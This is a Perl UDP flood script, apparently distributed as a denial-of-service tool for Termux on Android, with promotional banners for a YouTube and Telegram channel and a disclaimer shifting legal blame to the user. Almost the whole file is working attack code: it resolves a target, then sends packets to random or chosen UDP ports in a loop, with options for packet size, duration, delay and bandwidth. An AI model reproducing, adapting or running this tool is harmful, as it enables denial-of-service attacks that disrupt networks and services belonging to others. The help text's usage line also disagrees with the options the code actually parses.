#!/usr/bin/perl
#####################################################
# udp flood.
######################################################

use Socket;
use strict;
use Getopt::Long;
use Time::HiRes qw( usleep gettimeofday ) ;
use Term::ANSIColor qw(:constants);

our $port = 0;
our $size = 0;
our $time = 0;
our $bw   = 0;
our $help = 0;
our $delay= 0;

GetOptions(
	"port=i" => \$port,		# UDP port to use, numeric, 0=random
	"size=i" => \$size,		# packet size, number, 0=random
	"bandwidth=i" => \$bw,		# bandwidth to consume
	"time=i" => \$time,		# time to run
	"delay=f"=> \$delay,		# inter-packet delay
	"help|?" => \$help);		# help
	

my ($ip) = @ARGV;

if ($help || !$ip) {
  print BOLD RED <<'EOL';
   #::::::::::::::::::::::::::::::::#
    .___.                 ______,
    |   |__ ______   ___  \_____ \
    |   \ \/ /\__ \ /   \    (__ <,
    |   |\   / __ \| Y Y \ \      \
    |___| \_/ (____|__|_| /______ /
                  \/    \/      \/
   #:::::::$B By_CINDERELLA$C ::::::#
         [---] Join me on [---]
[-] www.youtube.com/Ivam3byCinderella [-]
           [-] t.me/ivam3 [-]

[USAGE]─➤ DoS-A-Tool <target> <local-port> <time> <pkg-size>
╰────<target>────➤ DNS|IP of target.
╰──<local-port>──➤ Local port to use.
╰─────<time>─────➤ Package time in seconds to send | default=0
╰───<pkg-size>───➤ Size of package to send | default=0

EOL
  exit(1);
}

print BOLD BLUE <<'EOL';
                -{ IbyC }
   -{ SO > Android - Only for Termux }
              -{ Coded by }
      #::::::::::::::::::::::::::::::#
      .___.                 ______,
      |   |__ ______   ___  \_____ \
      |   \ \/ /\__ \ /   \   _(__ <,
      |   |\   / __ \| Y Y \ /      \
      |___| \_/ (____|__|_| /______ /
                     \/   \/      \/
      #:::::::: By_CINERELLA ::::::::#
           [---] Join me on [---]
  [-] www.youtube.com/Ivam3byCinderella [-]
       [-] t.me/Ivam3byCinderella [-]
           [-] t.me/Ivam3_Bot [-]

          [---] SPECIAL THANKS [---]
                      TO
         [-] MY MASTER CINDERELLA [-]
               People don't die
      If they still live in the hearts
             of their loved ones
         We love her ... We miss her
                    *RIP*
            [---] DISCLAIMER [---]
     If the law is violated with it's use
       This would be the responsibility
          of the user who handled it
         [-] Use At Your Own Risk [-]

EOL
sleep(3);
if ($bw && $delay) {
  print BOLD RED "[w]\n ╰──➤ Computed packet size overwrites the --size parameter ignored\n",RESET;
  $size = int($bw * $delay / 8);
} elsif ($bw) {
  $delay = (8 * $size) / $bw;
}

$size = 256 if $bw && !$size;

($bw = int($size / $delay * 8)) if ($delay && $size);

my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die BOLD RED "[w]─➤ Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);

#rint "Atacking to ip: $ip " . ($port ? $port : "By:") . " Ivam3 >>" . 
print BOLD GREEN "Atacking to ip: $ip " . ($port ? $port : ":─➤ ") .
  ($size ? "$size-byte" : RESET "For help going to:─➤ ") . BLUE "https://t.me/Ivam3_Bot" . ($time ? " for $time seconds" : "") . "\n";
print GREEN "[+]─➤ Interpacket delay $delay msec\n" if $delay;
print "[+]─➤ Total IP bandwidth $bw kbps\n" if $bw;
print YELLOW "\n[!]─➤ To shut down the attack press Ctrl+C\n" unless $time;
die BOLD RED "[w]─➤ Invalid packet size requested: $size\n" if $size && ($size < 64 || $size > 1500);
$size -= 28 if $size;
for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1024-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
  usleep(1000 * $delay) if $delay;
  }
